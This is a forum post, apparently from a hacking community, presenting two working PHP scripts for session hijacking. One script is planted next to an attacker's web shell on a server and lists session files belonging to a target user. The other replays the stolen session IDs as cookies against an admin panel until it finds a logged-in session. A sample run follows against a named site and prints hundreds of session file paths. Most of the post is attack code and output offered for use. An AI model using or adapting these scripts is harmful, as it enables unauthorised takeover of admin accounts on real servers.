Share

Bypassing server security via auto session hijacking :)

Hi Guys
How r u doing?
Good or not , doesn't matter :D:D
Long time since my last post , hah!!!
i just want to refresh ur minds and show u Good technique for Bypassing (the over security) of some servers
1st of all let's put some rules
1 - the targeted script must depend on sessions on admin panel
other wise , it's not gonna work
2 - u should have little php knowledge to modify the script 4 ur own using

Got it?
let's go
1st script will be uploaded @ the Server , beside ur shell



<?
/*
+-------------------------------------------+
|    Forbidden Fucker (public Edition)      |
|          Coded By i-Hmx & Mango          |
|      n0p1337@gmail.com - ha.xxor.se      |
+-------------------------------------------+
*/
if($_POST['targetuser']=='')
{
die('Error');
}
$user=$_POST['targetuser'];
session_save_path();
$sesspath = session_save_path();
$sessmod = session_module_name();
if(empty($sessmod))$sessmod = ini_get('session.save_handler');
echo "[i] Session save handler: $sessmod\n";
if($sessmod !== 'files'){
echo "[!] Possible Error: session.save_handler is set to '$sessmod' instead of 'files'. Trying anyway.\n";
}

if(empty($sesspath)){
$sesspath = ini_get('session.save_path');
if(empty($sesspath)){
  if(function_exists('sys_get_temp_dir')){
  $sesspath = sys_get_temp_dir();
  }else{
  die('Error:Cant fins session save path. Try setting it manualy.');
  }
}
}
$sesspath = array_pop(explode(';',$sesspath));
echo "[i] Session save path: $sesspath\n";
// Enumerate sessions and their owner.
clearstatcache();
echo "  + Sessions found\n";
if(!findSessIn($sesspath,$user)){
die("[!] Error: Cannot open the session save path.\n");
}

function findSessIn($dir,$uz){
if(!($handler = opendir($dir))){
  return false;
}
while ($file = readdir($handler)){
  $path = substr($dir, -1) === DIRECTORY_SEPARATOR ? $dir.$file : $dir.DIRECTORY_SEPARATOR.$file;
  if (substr($file, 0, 5) === 'sess_'){
  $owner = fileowner($path);
  if(function_exists('posix_getpwuid')){
    $owner = posix_getpwuid($owner);
    $owner = $owner['name'];
  }
    if($owner==$uz)
    {
  // echo "$owner $path";
  echo "$path<<\n";
  }
  }elseif(strlen($file) === 1 && is_dir($path) && $file !== '.'){
  findSessIn($path,$user);
  }
}
closedir($handler);
return true;
}
?>

let's call it fa.php for Example
it's easy to understand
yet we will need another tool on our pc

<?
/*
| session auth testing part coded by i-Hmx
  + n0p1337@gmail.com
| session enum part Coded By Mango
  + ha.xxor.se
*/
echo "\n+-------------------------------------------+\n";
echo "|    Forbidden Fucker (public Edition)      |\n";
echo "|          Coded By i-Hmx & Mango          |\n";
echo "|      n0p1337@gmail.com - ha.xxor.se      |\n";
echo "+-------------------------------------------+\n";
echo "Enumorator Url# ";
$unumurl=str_replace('http://','',trim(fgets(STDIN)));
echo "Target User# ";
$uzz=trim(fgets(STDIN));
function get($url,$post,$cookies,$reffer){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,"http://".$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl,CURLOPT_COOKIE,$cookies);
curl_setopt($curl, CURLOPT_REFERER, $reffer);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
        $string = " ".$string;
        $ini = strpos($string,$start);
        if ($ini == 0) return "";
        $ini += strlen($start);
        $len = strpos($string,$end,$ini) - $ini;
        return substr($string,$ini,$len);
}
$faresult=fopen('faris_1337.r1z','ab');
$ok=get("$unumurl","targetuser=$uzz",'','');
echo $ok;
fwrite($faresult,$ok);
$myf=file('./faris_1337.r1z');
echo "\n-----------------------------------------\nAdmin Page Url# ";
$target=str_replace('http://','',trim(fgets(STDIN)));
echo "Good Login Key# ";
$key=trim(fgets(STDIN));
foreach($myf as $sess)
{
if(eregi('<<',$sess))
{
  $sess_id=kastr($sess,'_','<<');
  $test=get($target,'',"PHPSESSID=$sess_id;",'');
  if(eregi($key,$test))
  {
  echo "[*] $sess_id > Valid session\n";
  }
  else
  {
  echo "- $sess_id > Failed\n";
  }
}
}
echo "[+] Done\n";
fclose($faresult);
unlink('faris_1337.r1z');
?>
it's easy , readable Code
u may need to modify this ,
specially this line
if(eregi('<<',$sess))
using and idea is so easy
the 1st script will get the sessions for the targeted user
pass them to the script on our pc , which in turn test all sessions on the admin panel till the logged in mark is found
example
PhoeniX@PhoeniX-Lab /var
# php x.php

+-------------------------------------------+
|    Forbidden Fucker (public Edition)      |
|          Coded By i-Hmx & Mango          |
|      n0p1337@gmail.com - ha.xxor.se      |
+-------------------------------------------+
Enumorator Url# www.almohamadein.com/fa.php
Target User# asa7be
[i] Session save handler: files
[i] Session save path: /tmp
  + Sessions found
/tmp/sess_a60d366d9a2ad7a33516d742e0acb3c0<<
/tmp/sess_7e6b48474d4622bbbfdb44a0abee3ae5<<
/tmp/sess_cf1487d4d364d0d5b5da78d6a2f1c829<<
/tmp/sess_b490eaf9813e7ce2f9f970ec5d5148a8<<
/tmp/sess_69fb5a0be14029efa7823f36bba950a3<<
/tmp/sess_af20ab592b6436a4b4662b3ef9d20949<<
/tmp/sess_39492febe0be4657c8b74467a928ed86<<
/tmp/sess_08628cb08a83a88fb3b13cf0831ed2c2<<
/tmp/sess_3fe3f2dfd3c53e47a47f4a287023e4f1<<
/tmp/sess_7d3b2096da471dc454c7ebe37ea391a8<<
/tmp/sess_0ae576840230a014d66d13876274b4ec<<
/tmp/sess_d14f707dbacf3fc150d028d948a7783a<<
/tmp/sess_3adfad96853e169b614eab8cbb33f399<<
/tmp/sess_e8eb5d28f2e9477146b5d77a4641f2fa<<
/tmp/sess_7054ba034eecd52aaee4daf29b3f083f<<
/tmp/sess_a6b7407deff4c1ecf006beeb75816740<<
/tmp/sess_e8cebcc6e019029994a2ace049194c08<<
/tmp/sess_26172952f18902859ff1cc6db5e7a5c2<<
/tmp/sess_82acf501eee50586fafad1474ad3e6f8<<
/tmp/sess_bcc1e8dab78046443c25666ca3155e32<<
/tmp/sess_323a64eadbe2a9f3d65c92698a8a80c8<<
/tmp/sess_9ec31c6914e31acd0e309c062162e7f9<<
/tmp/sess_936443410e7ff83a2ed87436fb385c8c<<
/tmp/sess_cd5a0c95753e3edabe324b638181592d<<
/tmp/sess_6281d2ea4f929d5643f543c7ba6afe56<<
/tmp/sess_c28491c9d0761f286653d8dd2accf8f0<<
/tmp/sess_8244ba71a97f1a014c4af61185a3d9ca<<
/tmp/sess_d4a7db7eb38c2d27f3ae1c9b443c53d5<<
/tmp/sess_8156a7a26b3a3748ca0b29a5c82cb260<<
/tmp/sess_f6721942c9b08642eec43e207257b778<<
/tmp/sess_5280dd75b3910cc639a5e58c84fd7080<<
/tmp/sess_4423975c2c82fb9bb4079fd16aaeaedf<<
/tmp/sess_9862eb6c6ea821765edcf2d1041782c0<<
/tmp/sess_cf232579f2b648561151e5205faebb65<<
/tmp/sess_7ab7ca51d0d6dc9637e5b6bbed0204a7<<
/tmp/sess_b8e43af631a90288ef333ac6ed08a2fa<<
/tmp/sess_f984456a3e14b3ebc26504e71f2ba6e2<<
/tmp/sess_fc3c8586efdba8d2976d4cfddafee65a<<
/tmp/sess_2435e3ec36a579b7cdf48c0a6fa86607<<
/tmp/sess_771bfc8b10555433a94971d8768b7bcd<<
/tmp/sess_3065d2488dedaa0d85bb51c778ca2e02<<
/tmp/sess_6de0ec0941188d2ab4c8d7c25fbd879a<<
/tmp/sess_6711a02c5c824797432bfd4ec1b05ab3<<
/tmp/sess_110f95a0a542eb24ff2965b7e91b683e<<
/tmp/sess_7c469c0b53675efc5809c23b5d404ddc<<
/tmp/sess_2da7f789d7fa28dd08184e62fc86f00f<<
/tmp/sess_a17131c2d2d08933f8c57a121081ee03<<
/tmp/sess_8cc3e309addc46b9cf635145c49a8973<<
/tmp/sess_7ffbb0bd00cdbfe6669607ecc95b58a4<<
/tmp/sess_28dc7980b68af641a4c16a4e79388474<<
/tmp/sess_3bfdbf75f3f3b1e1f50d278e36e4da17<<
/tmp/sess_31f3296262c9ff2dbfa53e4ee99e3f9b<<
/tmp/sess_80635f37e8545085b32266330095f4f9<<
/tmp/sess_0a9765152480ac5ba5a41ab1906658cd<<
/tmp/sess_0f82aa0830eea9e1af47fe8e8e02e58b<<
/tmp/sess_5f55b1294e8d616264faf8282cad471a<<
/tmp/sess_723fd84101c50b3305a3a3dbb90dd6ae<<
/tmp/sess_a80a7d6fc50796f6c45b51b23a17e5f1<<
/tmp/sess_571e25546b5a77030c46c7bda02da2ae<<
/tmp/sess_70bcefe593b4a1e975fab08bbf0538f8<<
/tmp/sess_abb38919e4b679948b981a27975fd9e4<<
/tmp/sess_410d02d76f2af51a976d9becc5ad7360<<
/tmp/sess_f46d7ee19188fd870a3cb4e74eb82ba4<<
/tmp/sess_874c6f94105e69719cd7bafbd3f33ded<<
/tmp/sess_c3649de003ed87c92f448198deeb98cf<<
/tmp/sess_077fa3db98ea3bec4633b43d50900e3b<<
/tmp/sess_a50987b14f8548bc0a5ef371c8179285<<
/tmp/sess_43632ca49255779d48d911256520d66c<<
/tmp/sess_7433b04ae2faf5d51a48cd0f41664eb9<<
/tmp/sess_7fe2958665681c8570ae22b379502043<<
/tmp/sess_378b4ef8eeae9838f26c6f896ca997be<<
/tmp/sess_451a548ce742adafec7d9ffc05c10872<<
/tmp/sess_8c516323c603b3e9011bb82eb344cc1d<<
/tmp/sess_3ab630aa16811629f1d34dd9b9f25c29<<
/tmp/sess_b509495b5e46ecb88b78c27faa0c6288<<
/tmp/sess_e83d4ba01fcfa4cab704678f9ecfa51c<<
/tmp/sess_0ab0ade3d9edabdb6ad3d832bbc6e66b<<
/tmp/sess_23d2d65f702d2462e9744e06f2c36cec<<
/tmp/sess_9d9410587754ce2353b21796f02ad1d4<<
/tmp/sess_6d1cbe5609e691ca243c830b49e5d5fd<<
/tmp/sess_a50dd20343dba951e213a0fbaa6615eb<<
/tmp/sess_6a760531df12d3e85ea0df9e6f346c30<<
/tmp/sess_ba80a6a35559f16c0c8aca7ae13b6736<<
/tmp/sess_ebe9d1d5fc02c6f3af7f0bf2a7f1e2b1<<
/tmp/sess_d3e60149a7c62e9e1652b70d78c2a536<<
/tmp/sess_5e8828406dadf773a13a5eda90cb01a1<<
/tmp/sess_7b97c58c5470e9a7e06d8132a8cc6ba5<<
/tmp/sess_679ad5991ec8f4b3baf12e1338146bfd<<
/tmp/sess_36862e86570553ff79f82ab1000c950e<<
/tmp/sess_e7027392633424b0920f1115d51cb57e<<
/tmp/sess_a2add16dd0c4cecc5b300c2f6aea3775<<
/tmp/sess_ec6a51f74a5324b4e0418fe1dae313b4<<
/tmp/sess_bf36136dac9d8eacec78d63364ca5e78<<
/tmp/sess_c66710809fe25109983234ba766ef078<<
/tmp/sess_efdbe19dc0b207cfae70fc684400e755<<
/tmp/sess_5c79762226632f12c48f77ca39e4f6d4<<
/tmp/sess_a8c54d8747c85fd88c768799e3e7fb48<<
/tmp/sess_830df99844aeff8ec7a98014d6cb79ab<<
/tmp/sess_a94da4fa0dae3ab34a8d4cdc8546da5d<<
/tmp/sess_1bf95bb824e0be2ac7c6864e4b5b629f<<
/tmp/sess_238a0940a15063b5042de1a509059edd<<
/tmp/sess_654e9509e5d23212a4ccd32bd69dc9dc<<
/tmp/sess_6e84009801bc584a307d4ce27b120fbd<<
/tmp/sess_e6c167edcd951985e0595013af05a7e2<<
/tmp/sess_8ca0100ece878b63b88fa85f25f054d2<<
/tmp/sess_c24bc1d6fb9f524ed80ed61819d59640<<
/tmp/sess_0eaba2a8327d34209985b740b8f18557<<
/tmp/sess_7be052169d6f5ca251ff7d10d68eb345<<
/tmp/sess_6037abf60876435e5bd13672de4a32fe<<
/tmp/sess_2ad54dcbcc848b1fb70cf3f6a3b06517<<
/tmp/sess_238e28aab9ef9697068efe684a5e461c<<
/tmp/sess_827fefee02d53f4fe95d7f3819ff52f9<<
/tmp/sess_978914083fca5fe8fbb4d5207c1dd9bb<<
/tmp/sess_b1b3023752d2a4832b453b178ac9a63e<<
/tmp/sess_dd7c6039b8c03ee2f77f9475db016cc6<<
/tmp/sess_e81d5420519f8dd2003e6c86373daeb6<<
/tmp/sess_f05286d67bacc34963b784b014ff0f89<<
/tmp/sess_47d76307368f2d14be7acf638ceb9ebc<<
/tmp/sess_066fe1f99bee0e1f5d0acf3a6a2ca3b5<<
/tmp/sess_b169d4c17bed4339a9fd916d64c93ed9<<
/tmp/sess_ef40956680f352055b9ef9844ae84500<<
/tmp/sess_0b323896f0a331fd8af8c556a07caf03<<
/tmp/sess_c7f952312d9c5d2bcc27cd3e5189aecb<<
/tmp/sess_e27b9a5895c8a0ac961bad6941449d64<<
/tmp/sess_d37bf8c132bf0b9b01641c46ae0c1a06<<
/tmp/sess_02f84ee58490f0c237af5792d3214555<<
/tmp/sess_f3dab204d7410a97e398fd3f71ce4ac5<<
/tmp/sess_0e385e13dd2ece53a5a12bd8ecf1a00e<<
/tmp/sess_2c755829fb8571bf79ccaede17a8bd0d<<
/tmp/sess_bb9ae655e590866e497912d95426e8f3<<
/tmp/sess_2ebb2db4d26240a5d8d8e4f1a7b61530<<
/tmp/sess_9bca7095afe849144d4afbba4670969b<<
/tmp/sess_ad3dee380ed4231e3756fafca295daaa<<
/tmp/sess_301ef6153b88859deb7351e28ec29543<<
/tmp/sess_cc241d8b0a7e55062be401fab13916bb<<
/tmp/sess_3dfd093ee6bead6938c3c49a5c925a5b<<
/tmp/sess_7cc93e77d8c93f9e63337bc9b81e8cb7<<
/tmp/sess_fdb4933c0d8891def393da4a9fbc5ac5<<
/tmp/sess_8b4776f140fa01110059a54c2f7f240e<<
/tmp/sess_46f45aa0d9f880eeb5dfbe758d1a7327<<
/tmp/sess_54eb68df43f7fc1a6fcb5b16a1e66fd6<<
/tmp/sess_162f42ff9b908212d5e4e9042911ae3d<<
/tmp/sess_b2174fb7281af759969af4d5a58c21ec<<
/tmp/sess_ce3443f4e4950d5a7428c3b15a1f2643<<
/tmp/sess_b81393e9d6f99eb621f0c712ee779937<<
/tmp/sess_42e84b25024c04c17c30ff45ed6559dc<<
/tmp/sess_9283c9d7358084482371c1f4d30d221a<<
/tmp/sess_a690e8f5449c1de111122b9ff298944b<<
/tmp/sess_8cff19c13309be6bbfb2084ab13b2c8b<<
/tmp/sess_2426b1fa462d6d92c1433163ee4f8131<<
/tmp/sess_a30b17a56ff48fc727c124b105158ef8<<
/tmp/sess_4621e910a3477097c11c72886704435e<<
/tmp/sess_38973462fe404f2aa604325a4290edca<<
/tmp/sess_7083b017b35b82a030ebf07d0d12ae75<<
/tmp/sess_5f86f48a33611d549445a2aa2a8a620f<<
/tmp/sess_4271bd92af74c429f6ad82f2a3e55303<<
/tmp/sess_70cb08d2da77d3b5094891567c60ad78<<
/tmp/sess_e68b3d944bc533debacf8f2ff3300d08<<
/tmp/sess_ad801eab92939c07ade9535e0f8f09e7<<
/tmp/sess_c8f84b829c33a6baf85d9ee697ae57f8<<
/tmp/sess_7f073ed16cf69681314b0ac85366d847<<
/tmp/sess_336d19c117504ad8b3b0d86ef1057b8e<<
/tmp/sess_dc874f7bb1aabccd04947bb92f643c6d<<
/tmp/sess_86828d161dce9718d6a7e0622323af55<<
/tmp/sess_def1f31aae314d94c572dfed1335bf00<<
/tmp/sess_6bc16e944ea8261457bd63d3baf6e6b2<<
/tmp/sess_c82be39417a42976501e29b16b7bb8a0<<
/tmp/sess_72ea61a1b52b41ef268c2f24f44c3953<<
/tmp/sess_0648873688ff2f20a9c544a9e529cad1<<
/tmp/sess_2510634e9e90ca29cefc2629bead14e3<<
/tmp/sess_8d792825deb6a7bcc7f493a40e4fc9ed<<
/tmp/sess_af3a5c7db1034742e7e0508b240bdb59<<
/tmp/sess_f228f32eb7786465a271db83ae7818ab<<
/tmp/sess_7826075ca64ef0ad308f37813b82cf23<<
/tmp/sess_183fe09c4dd7a96e68d68721a63246d9<<
/tmp/sess_fd9716b7a92e771eb5be236775697536<<
/tmp/sess_296e4f943757319e8d798273e646f18a<<
/tmp/sess_8cfb06518ec3567b0f75f9a3c01ae7f8<<
/tmp/sess_318ae5a08752dd30c6ac19f7bb738180<<
/tmp/sess_fc444804a1ff5b8345debdba6ad193ac<<
/tmp/sess_c1cbe69edef4159e2e82ef0f477e63e9<<
/tmp/sess_56f6b0bdfbb3601501ca3c47aac3c096<<
/tmp/sess_4386c0d9d50d4757523ac9acf7f73f46<<
/tmp/sess_d6b47d8ffd6fd4cd8fa5af41607187b9<<
/tmp/sess_b6b388dbbcda646f8387512aaf939d6d<<
/tmp/sess_6d43b058a66825250ea28a3ed57f52ca<<
/tmp/sess_5c55e2875b318b851d1b9fad54470634<<
/tmp/sess_c23cccdc03dfa87e62c472ec6b2c78f0<<
/tmp/sess_26dafebf45169ca7a4b3d34ea8cb5d05<<
/tmp/sess_e8c879da44d11c5cfa4ca32410f1fc8b<<
/tmp/sess_d10da066c91ec2fae2ae96ba228175f5<<
/tmp/sess_4cae550a6b5bb43e637235c84bbc7038<<
/tmp/sess_344f938e4c01660fcff9fd2757914d79<<
/tmp/sess_cf00f00fe396391fd7326d0a552b7701<<
/tmp/sess_7138d191898888a15701848c410470be<<
/tmp/sess_142293add53e73025eb2393f12fa5bee<<
/tmp/sess_e8abf327b1545ca8200051c7af0d57a8<<
/tmp/sess_c9783e97fd38a49e16df0c4e012c7c80<<
/tmp/sess_cbaa1e16bb4f237233361d4385e6ed4f<<
/tmp/sess_adf206253ad579ae1a3804fd1988b3f3<<
/tmp/sess_10cbf6b95e1981216fae32760a5b2d96<<
/tmp/sess_7c53b9e8dca7405f2c5c8455fe5c721e<<
/tmp/sess_4037db64c7bb9de5cd4532cc8e157d01<<
/tmp/sess_660f1e2a4035ff82bac759cb8806209a<<
/tmp/sess_f7a6d21082fc89cd0f1c3115f1bdcec4<<
/tmp/sess_3b7847641d9451edaab6fd09cd939d11<<
/tmp/sess_487dabf13c0919916dc4d0fbe9597a7b<<
/tmp/sess_34110d4e1324bad22b199041ca848efd<<
/tmp/sess_d9372914ca9cb5170d0c6e3716977ad1<<
/tmp/sess_74bbe473b98407430f6d8fc294bef487<<
/tmp/sess_d468f83226771a5c384ce4d2b684b44a<<
/tmp/sess_0fd8b9a66a19baa549dd8cb91f107d0d<<
/tmp/sess_733488179e67470833b95742f2dc878a<<
/tmp/sess_ceb7cb4a7c3f33d4359036206def151d<<
/tmp/sess_e8164648cb091494e34ce13ea417c121<<
/tmp/sess_d6a36c2338cba086d268c4dcdbbe29c6<<
/tmp/sess_5a10dcc74c6ded4ae3b65bc035d87025<<
/tmp/sess_b77eee191237ae4ac0f667297888aaa0<<
/tmp/sess_55ce9fa5073fbb154ff7d736771c4a79<<
/tmp/sess_1e62ac02ee89c37abaa2da79a03d1537<<
/tmp/sess_2151e01a4889658b0c96b58a07e90824<<
/tmp/sess_d02c0bc8298128982c3a7bbf72aca2d7<<
/tmp/sess_d8eb40e4f4abfd5a0ff3c5c016f07a59<<
/tmp/sess_fad1f677cd1b67791b48c4d7aa63b092<<
/tmp/sess_248ba2ff1c58bd6927f0ea88d5d411c5<<
/tmp/sess_0b63772866a4569dcf15af716aafd844<<
/tmp/sess_8cf2b9b2b723ab92f9873ee4787ca879<<
/tmp/sess_fd458c01083f553a1039c1e87dff4f8a<<
/tmp/sess_98946f70a4e6ce4d39701eb0c139cd6a<<
/tmp/sess_d90346420f9a687dd2c45ce36057a482<<
/tmp/sess_4c7f1c7bf7d75e64aa254aa9577b9ec7<<
/tmp/sess_b7621f60a52a0cedc629182e3b148130<<
/tmp/sess_0378a4abf4c9e701d9d34b5a4ee62166<<
/tmp/sess_39bfe3b5b7d72bad29d350ab2157e2db<<
/tmp/sess_c61c3e6533103af0bc8b771c2706b424<<
/tmp/sess_b4849d9b0d7adf4dd878302850b075c8<<
/tmp/sess_063bff82b89cfabefcfafbd2113a845c<<
/tmp/sess_af13d560f51f2b1c2e26e2461de5682f<<
/tmp/sess_83c89822b34cbad9d9d1d715f3136db9<<
/tmp/sess_0bc139f8d22ce18632c3aae794c02cc5<<
/tmp/sess_cb80ad982f95801693478140132762be<<
/tmp/sess_db3a872d9d8901e8df6cb7cb1c24c013<<
/tmp/sess_007dbdecfdd32372aed04c43dcd1126d<<
/tmp/sess_7f1a8c4223746a0faa3263352d3cb7fc<<
/tmp/sess_223d4d2cb310bd1c6e92fb757429c956<<
/tmp/sess_932c9a0298cf160903858ca87e64adb0<<
/tmp/sess_19fdeb5954e659f2e40f17ce71abbcf1<<
/tmp/sess_7d0c4acb21fdb12f4907a33d5347edd9<<
/tmp/sess_6b69216b07ca94d276bf17b098a722a5<<
/tmp/sess_3e8aafd25ddb43a511963d09b4e91f3c<<
/tmp/sess_494ab351a5956f3949de2f624c353ea3<<
/tmp/sess_d1ff277946840ba51832b9f707c876ab<<
/tmp/sess_a8cf318aada48c46334fa7fd576abfad<<
/tmp/sess_38848946a7fa2b95f51d70dbaad5d014<<
/tmp/sess_c5588e3e6a6067f406bac5ab6f976ccc<<
/tmp/sess_0407d1740772ecc6f228cd02b6e3a2f0<<
/tmp/sess_e160d329a50ebc5466ac0b03344583a8<<
/tmp/sess_bab50bc73fad00dec6e0f60c39a1e75e<<
/tmp/sess_afd127205676f750cfbdb7df3fa8cb8f<<
/tmp/sess_dcde16afd1b2fe58064354e14dc2dd02<<
/tmp/sess_6e66cc08eda3829148ada3df6f25ff56<<
/tmp/sess_d73e039d4ba11745e96551ee0e7bf2a8<<
/tmp/sess_9f38937e729cc840cdfecc4aac0d0c2a<<
/tmp/sess_5883c48744b79dd47913bc7cab9b6ac9<<
/tmp/sess_d4ad59d23e050100214782c80d98b272<<
/tmp/sess_494f48c34673cbb8179e34c74c4cfdb8<<
/tmp/sess_2247960fffd053f22321ad78005c73f5<<
/tmp/sess_b03810d85b12d59b0a29ef04a583d147<<
/tmp/sess_542c6251f7b291cfbf2ce14a3331890f<<
/tmp/sess_0dec5323b4a63eecb3c4a893fa04f8c7<<
/tmp/sess_e220d02a8439c5f87296534a4327d427<<
/tmp/sess_4782e8e835ad1b68c3cdc4570f89d7e0<<
/tmp/sess_4d00c3b14501c8e9b713d3cbb882a397<<
/tmp/sess_45ca6329a3041e9036fbea47baf1e17b<<
/tmp/sess_2343a3de89a827ad06aafc8f7ea5980f<<
/tmp/sess_4a3d8e2bd869836083e40a91552d0cb3<<
/tmp/sess_f153075c54e6a33dbf47997b43b25e19<<
/tmp/sess_a4a60070254d4440e633b3c48af3c42c<<
/tmp/sess_343ff6799a8beb63974b95e89ef54174<<
/tmp/sess_1279d687a6653061e1c6ccc1aa4477ed<<
/tmp/sess_7c991e025a0688ee297511965392c6d8<<
/tmp/sess_f5eae35471f20cc88c69745c31cf4cb0<<
/tmp/sess_e90ebee9c31c3cad3e6171b81345cb98<<
/tmp/sess_d748eff0ac6a990a7889590f311d1040<<
/tmp/sess_61a3b26883cf36eae8d1c571f0e44faa<<
/tmp/sess_95e067885380815a21ee576672926d9d<<
/tmp/sess_f0e1e2a65198892431d6899cc22d3f54<<
/tmp/sess_298e22549fdf7908e54eef23225cda4d<<
/tmp/sess_56262e8513a9e3aac35837b5e708bd6d<<
/tmp/sess_1aba1f4ff80c713f6464a8f11b01e10c<<
/tmp/sess_5cd36d4f2721904ab9d1a5286f8685ba<<
/tmp/sess_911eb12d7a9b12b6d6fce4c9be073743<<
/tmp/sess_da679ccf3255006c9864b7a4498e044d<<
/tmp/sess_f64f9fe490285eaa913993c148ab8c73<<
/tmp/sess_03572aa3d530dc90ceb002ce252e8c95<<
/tmp/sess_1071bb1b5d4e337dfc150c3964be75ab<<
/tmp/sess_7422d64892b0e2d71f8209034b760afb<<
/tmp/sess_2a14a83442badaf2b607f17b9682f8ec<<
/tmp/sess_2df9ebe2474aa78734e83c1e3d858132<<
/tmp/sess_d463a0a7738cd4a1e6e6f25a02d9bbfc<<
/tmp/sess_6d6aaebe06020059f97bd8a5e66bd0eb<<
/tmp/sess_17cb5789c93914dfd9d7b8e5197cb087<<
/tmp/sess_36e725be8727e6103568aae32a31bed2<<
/tmp/sess_1fd6ecce10118d2ebf200029f1aebeae<<
/tmp/sess_481c5c943f35bc71d4d06130105320a0<<
/tmp/sess_d023da56c8c24bb41a55f6dde0a148ce<<
/tmp/sess_fc35358c317952fcaa8a6bc759ac2e3d<<
/tmp/sess_8b267797f9eb71fe41f2ecffdfe22d4c<<
/tmp/sess_6c3d42885119f1c1df23a378df4adfa9<<
/tmp/sess_1f8c715044953df6fa400ad96425081c<<
/tmp/sess_89cb3ace74df603112720fa16f56e964<<
/tmp/sess_5ae54390b6ffd697285eba33836e0d4c<<
/tmp/sess_f658b26b1d4b1823b72807afd6d7cbb5<<
/tmp/sess_31950b751318f1cdd864b8f07f257b3a<<
/tmp/sess_712bce140a8932861c4acfdde69ed606<<
/tmp/sess_244903cccc40b0997d3a32c903c0e6fd<<
/tmp/sess_ae1e0bed77217778ff5999f13914ae7c<<
/tmp/sess_1b8b4513137dbc828015600288643cce<<
/tmp/sess_bc5d1809ce92e23611ccb33f98dc96c0<<
/tmp/sess_d0c03318ddcbbb9422ccdd282738b141<<
/tmp/sess_090caaaecad671a62c58833043f1497d<<
/tmp/sess_66e3342e13b26b0a2da8dfd8c28fb687<<
/tmp/sess_d6b2f714b5e9388727a822e9e03fb552<<
/tmp/sess_7f52e36e0fb83a2c13a3d879ac475095<<
/tmp/sess_5b9012d763bfb7c45deb67aff89b7907<<
/tmp/sess_452adb66efeac42cce802b23378b52cd<<
/tmp/sess_5ad2bbb8fdbd8102db821da0d0e1255b<<
/tmp/sess_7d51cd9d3d86caadaeacf8d9a7f098ab<<
/tmp/sess_835fcbb27dde8a9df6819f95a9b9862a<<
/tmp/sess_e87f9716e8e4b5dfdd82141573786ade<<
/tmp/sess_579b5e746ac7fd8d8e4246924806b2ff<<
/tmp/sess_a555eb67a2335369217ddeddbbc8e155<<
/tmp/sess_db24b9d405f1d9f42a9a7e9e002bc255<<
/tmp/sess_bf67c983659c5705167173e28bc516c1<<
/tmp/sess_837f2700222201c52095de401c2adacf<<
/tmp/sess_3251c683e48df6e05a7e9211f1726f34<<
/tmp/sess_624cafacc4f6eda3fcc97f0cd9db36e6<<
/tmp/sess_1d284bed1551e643b5a70ad39f8590f7<<
/tmp/sess_3a083268bbbb751c1759d63421518b5a<<
/tmp/sess_97dfdef38ba77aaafe4e386d477e930d<<
/tmp/sess_33d2df285cd3734f2deed74865443744<<
/tmp/sess_fabb287d2ff3b919af5000ab8dc8e33c<<
/tmp/sess_b41a68cd40a0574fa37daa5ae3f0ec61<<
/tmp/sess_b73ba10d0172c13cbdb2585bf6c665ac<<
/tmp/sess_ae7df29029efe96b0fc294e74b2394e9<<
/tmp/sess_4c1aa25c58809273af62eb5492abc75a<<
/tmp/sess_b578a4de47bc6af98d25c11e6c524872<<
/tmp/sess_5203c09b278787d10dc92aa080c23d48<<
/tmp/sess_f2bb07c4ccc3ad1e4b8702c1eb210d24<<
/tmp/sess_39cf0f3519d75a088ea26cdfd84f1b46<<
/tmp/sess_ceaa5793e59019cd645d90e4d1ca2c69<<
/tmp/sess_98cce2c66e80d107112ec1caa941f474<<
/tmp/sess_0f0171809b8b320cc0b6d419f6c24104<<
/tmp/sess_aad877ff29ba8a9d5653c43ffd9144ee<<
/tmp/sess_e38b0eadcf7cf06230f6474c5f81e0db<<
/tmp/sess_bab2660a7d2a8a107b2112d35af98d0b<<
/tmp/sess_8b237e6566987a213bdcbfcfcb54dc83<<
/tmp/sess_81096257f613fc79834e37ac41738f85<<
/tmp/sess_738aa845d5ba4056a4aa69570aea8b3d<<
/tmp/sess_b0e9381e6989e2ec823606a592edf7cc<<
/tmp/sess_9fee6051d245b55f673a339a936ca4a3<<
/tmp/sess_6d63714dcbb4d0f00041ba053e30eea4<<
/tmp/sess_90d1eed8c9313566b628a8f26cd554df<<
/tmp/sess_704589e1037052af2c81629c06921ce8<<
/tmp/sess_4389d6ff96fe47c85c59a642ac7341ec<<
/tmp/sess_79cb8d513a7fb687a76582a10dfbff81<<
/tmp/sess_ebdebb68236f91d838baadee14d3cc23<<
/tmp/sess_741d32deba96907eb88d8ec84e658c80<<
/tmp/sess_91d7ea0a970d41dfdd3097cbf4c6cbaa<<
/tmp/sess_a3d8980900fa769f6e7eb546bf9ee3bb<<
/tmp/sess_386fe619aaec64a7e7c9b0be2890adbe<<
/tmp/sess_0aff34027fbd7008849722b2ee5e66ce<<
/tmp/sess_c3cb7decc853071137690a497d01b966<<
/tmp/sess_17778d8aafea659415149557e417b00e<<
/tmp/sess_8ee603f731d2e00c5b845f7706dddd4d<<
/tmp/sess_d391201bfdd7c0bae0434602ceb5d0e3<<
/tmp/sess_ded58a053691ed59e2975faaccd34833<<
/tmp/sess_df72277989d9360e593949a4e9f509c5<<
/tmp/sess_bdea0cc8e1d055392a93b6719dae83ea<<
/tmp/sess_40462b85e1fea40ecabce0a9dd46d398<<
/tmp/sess_64201a62f49a39f6339c0eda500950d3<<
/tmp/sess_9a123847df0b3b85be0b0b478fca98b4<<
/tmp/sess_769850df895039f0746f71760bd3f757<<
/tmp/sess_ee2fcaa822411169fb0ffb82a1d76e7f<<
/tmp/sess_60a8d707fabb8ad12345325acfb5c9b2<<
/tmp/sess_793a585107eb25aee27238b81cb7e858<<
/tmp/sess_f73d493d91fc56153fe355c002791a0d<<
/tmp/sess_a259d974d9dcf27f9f4a918806a816f2<<
/tmp/sess_7454c7f51cc07a9f7801fd4c73c01d50<<
/tmp/sess_c33e4a44d6b6c75d4109a5d40bc77dd3<<
/tmp/sess_77b6813dea3235dccb5e55c8ab398c38<<
/tmp/sess_2cf772d1ab7fcdcb4f13c8477c5bf608<<
/tmp/sess_9220d1e185892ead3e84b8064fd51da6<<
